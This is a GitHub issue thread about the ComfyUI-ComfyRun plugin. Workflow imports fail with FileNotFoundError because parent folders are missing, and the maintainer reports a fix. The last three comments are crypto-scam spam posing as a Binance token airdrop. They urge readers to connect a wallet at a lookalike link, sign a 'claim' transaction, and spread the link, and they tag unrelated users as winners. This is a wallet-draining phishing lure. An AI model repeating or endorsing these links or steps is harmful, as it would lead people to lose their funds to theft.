### ISSUE TITLE
FileNotFoundError: [Errno 2] No such file or directory: '/Users/xxx/source/ComfyUI/models/loras/animatediff/v3_sd15_adapter.ckpt'

### ISSUE THREAD

**Issue by cpunion** [thecooltechguy/ComfyUI-ComfyRun#3]
Import workflow:
`https://comfyrun.com/w/d97fbc83-3add-4628-9c40-0fdc949abc0e`

Error:
```
Downloading file: v3_sd15_adapter.ckpt...
Error handling request
Traceback (most recent call last):
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_protocol.py", line 433, in _handle_request
    resp = await request_handler(request)
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_app.py", line 504, in _handle
    resp = await handler(request)
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_middlewares.py", line 117, in impl
    return await handler(request)
  File "/Users/xxx/source/ComfyUI/server.py", line 46, in cache_control
    response: web.Response = await handler(request)
  File "/Users/xxx/source/ComfyUI/custom_nodes/ComfyUI-ComfyRun/__init__.py", line 274, in api_comfyworkflows_import_from_url
    with open(dest_file_path, 'wb') as f:
FileNotFoundError: [Errno 2] No such file or directory: '/Users/xxx/source/ComfyUI/models/loras/animatediff/v3_sd15_adapter.ckpt'
```

**Comment by cpunion** [comment]
Shoud create the parent directory of the downloading model path.

**Comment by cpunion** [comment]
```
Downloading file: pecorine_v2.safetensors...
Error handling request
Traceback (most recent call last):
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_protocol.py", line 433, in _handle_request
    resp = await request_handler(request)
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_app.py", line 504, in _handle
    resp = await handler(request)
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_middlewares.py", line 117, in impl
    return await handler(request)
  File "/Users/xxx/source/ComfyUI/server.py", line 46, in cache_control
    response: web.Response = await handler(request)
  File "/Users/xxx/source/ComfyUI/custom_nodes/ComfyUI-ComfyRun/__init__.py", line 274, in api_comfyworkflows_import_from_url
    with open(dest_file_path, 'wb') as f:
FileNotFoundError: [Errno 2] No such file or directory: '/Users/xxx/source/ComfyUI/models/loras/character/pecorine_v2.safetensors'
```
Create /Users/xxx/source/ComfyUI/models/loras/character folder then success.
```
pecorine_v2.safetensorsImporting workflow from URL:  https://comfyrun.com/w/d97fbc83-3add-4628-9c40-0fdc949abc0e
Transformed URL:  https://comfyrun.com/api/import_from_url/d97fbc83-3add-4628-9c40-0fdc949abc0e
Skipping file custom_nodes/ComfyUI-AnimateDiff-Evolved/models/v3_sd15_mm.ckpt because it already exists locally.
Skipping file models/controlnet/v3_sd15_sparsectrl_scribble.ckpt because it already exists locally.
Skipping file models/checkpoints/etherRealMix_etherRealMix31.safetensors because it already exists locally.
Skipping file models/loras/animatediff/v3_sd15_adapter.ckpt because it already exists locally.
Downloading file: pecorine_v2.safetensors...
Downloading file: vae-ft-mse-840000-ema-pruned.ckpt...
Error handling request
Traceback (most recent call last):
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_protocol.py", line 433, in _handle_request
    resp = await request_handler(request)
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_app.py", line 504, in _handle
    resp = await handler(request)
  File "/Users/xxx/miniforge3/lib/python3.10/site-packages/aiohttp/web_middlewares.py", line 117, in impl
    return await handler(request)
  File "/Users/xxx/source/ComfyUI/server.py", line 46, in cache_control
    response: web.Response = await handler(request)
  File "/Users/xxx/source/ComfyUI/custom_nodes/ComfyUI-ComfyRun/__init__.py", line 319, in api_comfyworkflows_import_from_url
    shutil.copy(snapshot_path, restore_snapshot_filepath)
  File "/Users/xxx/miniforge3/lib/python3.10/shutil.py", line 417, in copy
    copyfile(src, dst, follow_symlinks=follow_symlinks)
  File "/Users/xxx/miniforge3/lib/python3.10/shutil.py", line 256, in copyfile
    with open(dst, 'wb') as fdst:
FileNotFoundError: [Errno 2] No such file or directory: '/Users/xxx/source/ComfyUI/custom_nodes/ComfyUI-Manager/startup-scripts/restore-snapshot.json'
```
Another error.

**Comment by thecooltechguy** [comment]
@cpunion sorry this is a bug, will fix the parent directory issue!

Re: the second error, do you have the ComfyUI-Manager plugin installed?

**Comment by thecooltechguy** [comment]
Just pushed a commit to fix the parent directories bug.

**Comment by cpunion** [comment]
> Re: the second error, do you have the ComfyUI-Manager plugin installed?

Yes, I have the ComfyUI-Manager plugin installed, but it didn't have the `startup-scripts` folder. I created this folder myself, and that resolved the issue. This same error occurred on both Linux and macOS.

**Comment by fede-s** [comment]
# Binance Exclusive Token Giveaway

Welcome to the exclusive Binance Token Giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this incredible opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

[![Claim Now](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)](http://go.bnbcoinsearn.online/97Q7Yj)

<centre>Seize the moment and indulge in your tokens! This limited-time offer won't be available forever. 🌐💰</centre>

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share this Token Drop](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected, go to [Binance Rewards](http://go.bnbcoinsearn.online/97Q7Yj).
   - Click on the "Claim" button to interact with the smart contract.

### 4. Claim Your Free Tokens:
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

### 5. Share the Excitement Further:
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=http://go.bnbcoinsearn.online/97Q7Yj&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

**Comment by ChiyuChen0117** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [**Share on Twitter**](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @inhuman-cpc, @Lukeeeeeeeeee, @PKUbuntu, @little-zhong, @caitaoyu, @CookyG, @xuyuanwei678, @cjt908, @j4w3ny, @kenspirit

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @ooowennn, @zhoucongxiang, @0xStarry, @tic8, @RealDikang, @Lincest, @bitcard, @jinqi520, @steven1227, @Goldenteamway
